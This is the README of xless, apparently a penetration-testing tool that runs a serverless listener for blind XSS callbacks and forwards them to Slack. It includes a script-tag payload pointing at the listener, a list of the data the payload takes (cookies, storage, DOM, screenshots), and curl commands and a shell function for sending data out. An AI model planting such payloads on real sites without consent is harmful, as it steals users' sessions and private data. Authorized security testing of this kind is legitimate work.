Awesome
<h1 align="center"> <br> <a href="https://github.com/mazen160/xless"><img src="https://user-images.githubusercontent.com/29874489/58731472-4f6c8080-83de-11e9-8206-992f4d777fdc.png" alt="Xless"></a> <br> xless <br> </h1> <h4 align="center">The Serverless Blind XSS App</h4> <p align="center"> <img src="https://img.shields.io/maintenance/yes/2021.svg?style=flat-square" alt="Maintained" /> <img src="https://img.shields.io/bitbucket/issues-raw/mazen160/xless.svg?style=flat-square" alt="Issues" /> <img src="https://img.shields.io/github/last-commit/mazen160/xless.svg?style=flat-square" alt="Last Commit" /> </p>:information_source: About The Project
Xless is a serverless Blind XSS (bXSS) application that can be used to identify Blind XSS vulnerabilities using your own deployed version of the application.
There is no need to run a full deployment process; just setup a vercel.com account and run bash deploy.sh
.
That's it. You now have a fully-running Blind XSS listener that uses Slack to notify you for callbacks.
:warning: Requirements
- vercel.com account: Vercel provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
- Slack Incoming Webhook URL.
- IMGBB (free) Account and API key - for the screenshots.
:rocket: Deployment
- Run
bash deploy.sh
$ bash deploy.sh
> Deploying ~/xless under X
> https://custom-xless-deployment.vercel.app [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
- Use the URL for blind XSS testing :fire:
Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.
:speech_balloon: Example Payload
<script src="https://custom-xless-deployment.vercel.app"></script>
:eyes: Demo
:incoming_envelope: Collected Data
- Cookies
- User-Agent
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- Origin
- LocalStorage
- SessionStorage
- IP Address
- Screenshot
:satellite: Out-of-Band (OOB) Callbacks Listener
Xless also works as an OOB (Out-of-Band) callbacks listener for HTTP/HTTPS requests. Any HTTP GET request that is sent to non-parent path will be alerted.
:eyes: Demo
$ curl https://custom-xless-deployment.vercel.app/callback-canary
Or anything random, such as:
$ curl https://custom-xless-deployment.vercel.app/88bf0ecd
:man_health_worker: Health Check
Xless provides a /health
endpoint to let you know that everything is configured correctly.
The current tests are the existance of the API keys and a successful image upload to IMGBB.
Example Blind XSS payloads
You can view a number of handy XSS payloads for your xless app at $URL/examples
- URL:
https://custom-xless-deployment.vercel.app/examples
Once you deploy your app, you can find the examples there.
:envelope_with_arrow: Scriptable Messages
You can use Xless to send direct messages to your listener. It can be useful in data exfiltration or as a scriptable way to send messages and alerts to your Slack app.
# on your (bashrc / zshrch) file:
function xless() {
curl -s https://custom-xless-deployment.vercel.app/message --data "text=$1"
}
Contribution
Contribution is very welcome. Please share your ideas by Github issues and pull requests.
Here are some ideas to start with:
Enabling sharing of page screenshot.Scriptable message.- Your idea of a new feature?
Acknowledgement
- Matthew Bryant for the XSS Hunter project.
- Rami Ahmed for the "xless" name idea.
- Damian Ebelties for the logo.
- Rotem Reiss for the screenshot feature.
- Vercel.com for operating a great serverless platform.
Awesome Similar Projects
- Azure-xless: An Xless implementation for Microsoft Azure Function by Daan Goumans.
Legal Disclaimer
This project is made for educational and ethical testing purposes only. Usage of xless for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
License
The project is currently licensed under MIT License.
Author
Mazin Ahmed
- Website: https://mazinahmed.net
- Email: mazin [at] mazinahmed [dot] net
- Twitter: https://twitter.com/mazen160
- Linkedin: http://linkedin.com/in/infosecmazinahmed